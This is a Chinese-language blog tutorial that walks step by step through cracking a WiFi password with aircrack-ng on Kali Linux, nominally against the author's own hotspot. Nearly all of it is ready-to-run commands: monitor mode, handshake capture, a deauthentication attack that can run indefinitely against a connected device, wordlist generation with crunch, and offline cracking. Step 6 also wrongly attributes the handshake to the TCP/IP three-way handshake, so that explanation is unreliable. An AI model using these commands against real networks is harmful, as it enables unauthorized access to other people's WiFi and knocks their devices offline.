Kail Linux使用aircrack-ng破解WiFi
Kail Linux使用aircrack-ng破解WiFi前言:闲着无事,就自己开了个热点打算自己破解以练习kali Linux 和 Linux 的使用准备:将准备好的无驱无线网卡接入kali虚拟机1.查看无线网卡是否接入成功命令: iwconfig2.启动无线网卡监听模式命令:airmon-ng start wlan...
Kail Linux使用aircrack-ng破解WiFi
前言:
闲着无事,就自己开了个热点打算自己破解以练习kali Linux 和 Linux 的使用
准备:将准备好的无驱无线网卡接入kali虚拟机
1.查看无线网卡是否接入成功
命令: iwconfig
2.启动无线网卡监听模式
命令:airmon-ng start wlan0
3.开启无线监听模式后,查看网卡经营模式是否已开启
命令: iwconfig
4.启动airodump-ng 扫描附近的wifi
命令格式 : airodump-ng 无线网卡名称
网卡名称可以用iwconfig 命令查看
命令:airodump-ng wlan0mon
这样附近的wifi名称 及各种数据就有了
此时记下 前面的BSSID(可以认为是一种MAC地址)CH (信道) ESSID (wifi名称) ENC(wifi加密方式)
5.监听该wifi 并获取 握手包
命令格式 airodump-ng -c CH -w 数据包保存的位置/文件名称 --bssid MAC地址 无线网卡名称
例: airodump-ng -c 1 -w /root/cap/er8 --bssid 0c:D8:6c:1E:BB:60 wlan0mon
可以看到该WiFi中连接有一个设备
6.接下来就要等待连接在这个wifi中的设备进行一个断开,重新连接的的过程,以为根据http/IP协议中,会有三次握手,这三次握手会有握手包的产生
如果没有我们可以手动将该设备进行一个断开攻击 重新打开一个客户端执行以下命令
命令格式:aireplay-ng -0 攻击次数 -a 设备的MAC地址 无线网卡名称
PS:设备的MAC地址既STATION 值 攻击次数为0时 为无限次攻击
命令:aireplay-ng -0 5 -a 0c:D8:6c:1E:BB:60 wlan0mon
7.在原来的客户端里可以看到已经抓到了握手包
8.此时我生成一个密码字典
命令格式: crunch 生成字典中最小的数的密码 生成字典中最大的数的密码 字典中会出现的字符 (由于时间关系,此处我只填了123)
命令:crunch 10 10 123 >>/root/123.txt
9.用刚刚生成的密码字典进行跑包
命令 aircrack-ng -w /root/123.txt /root/cap/er8-01.cap
命令格式: aircrack-ng -w 密码字典目录 握手包目录
更多推荐
所有评论(0)